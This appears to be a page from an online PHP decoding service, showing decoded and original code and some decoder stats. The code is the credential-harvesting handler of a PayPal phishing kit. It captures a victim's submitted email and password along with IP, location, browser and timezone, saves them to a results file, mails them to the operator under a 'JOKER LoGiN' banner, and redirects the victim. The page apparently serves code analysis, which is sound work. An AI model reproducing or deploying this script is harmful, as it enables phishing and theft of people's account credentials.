Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php if (isset($_POST['EML']) && isset($_POST['PWD'])) { session_start(); inclu..
Decoded Output download
<?php if (isset($_POST['EML']) && isset($_POST['PWD'])) {
session_start();
include '../mine.php';
include '../../app/lib/pics/pope.gif';
$_SESSION['EML'] = $_POST['EML'];
$msg = "=========== <[ JOKER LoGiN]> ===========
";
$msg .= "EMAIL : {$_POST['EML']}
";
$msg .= "PASS : {$_POST['PWD']}
";
$msg .= "---------------------- IP Info ----------------------
";
$msg .= "IP ADDRESS : {$_SESSION['ip']}
";
$msg .= "LOCATION : {$_SESSION['ip_city']} , {$_SESSION['ip_countryName']} , {$_SESSION['currency']}
";
$msg .= "BROWSER : {$_SESSION['browser']} on {$_SESSION['os']}
";
$msg .= "TIMEZONE : {$_SESSION['ip_timezone']}
";
$msg .= "TIME : " . now() . " GMT
";
$msg .= "=========== <[ JOKER LoGiN]> ===========
";
$save = fopen("../../rzlt.txt", "a+");
fwrite($save, $msg);
fclose($save);
$subject = "PaYPal LoGiN [" . $_POST['EML'] . "|" . $_SESSION['ip_countryName'] . "]";
$headers = "From:JOKER <[email protected]>
";
$headers .= "MIME-Version: 1.0
";
$headers .= "Content-Type: text/plain; charset=UTF-8
";
@mail($yours, $subject, $msg, $headers);
@mail($info, $subject, $msg, $headers);
exit(header("Location: ../../app/process"));
}
?>
Did this file decode correctly?
Original Code
<?php if (isset($_POST['EML']) && isset($_POST['PWD'])) {
session_start();
include '../mine.php';
include '../../app/lib/pics/pope.gif';
$_SESSION['EML'] = $_POST['EML'];
$msg = "=========== <[ JOKER LoGiN]> ===========\r\n";
$msg .= "EMAIL : {$_POST['EML']}\r\n";
$msg .= "PASS : {$_POST['PWD']}\r\n";
$msg .= "---------------------- IP Info ----------------------\r\n";
$msg .= "IP ADDRESS : {$_SESSION['ip']}\r\n";
$msg .= "LOCATION : {$_SESSION['ip_city']} , {$_SESSION['ip_countryName']} , {$_SESSION['currency']}\r\n";
$msg .= "BROWSER : {$_SESSION['browser']} on {$_SESSION['os']}\r\n";
$msg .= "TIMEZONE : {$_SESSION['ip_timezone']}\r\n";
$msg .= "TIME : " . now() . " GMT\r\n";
$msg .= "=========== <[ JOKER LoGiN]> ===========\r\n\r\n\r\n";
$save = fopen("../../rzlt.txt", "a+");
fwrite($save, $msg);
fclose($save);
$subject = "PaYPal LoGiN [" . $_POST['EML'] . "|" . $_SESSION['ip_countryName'] . "]";
$headers = "From:JOKER <[email protected]>\r\n";
$headers .= "MIME-Version: 1.0\r\n";
$headers .= "Content-Type: text/plain; charset=UTF-8\r\n";
@mail($yours, $subject, $msg, $headers);
@mail($info, $subject, $msg, $headers);
exit(header("Location: ../../app/process"));
}
Function Calls
session_start | 1 |
Stats
MD5 | e6618dd153ff269dce3d49263fc3a9c4 |
Eval Count | 0 |
Decode Time | 79 ms |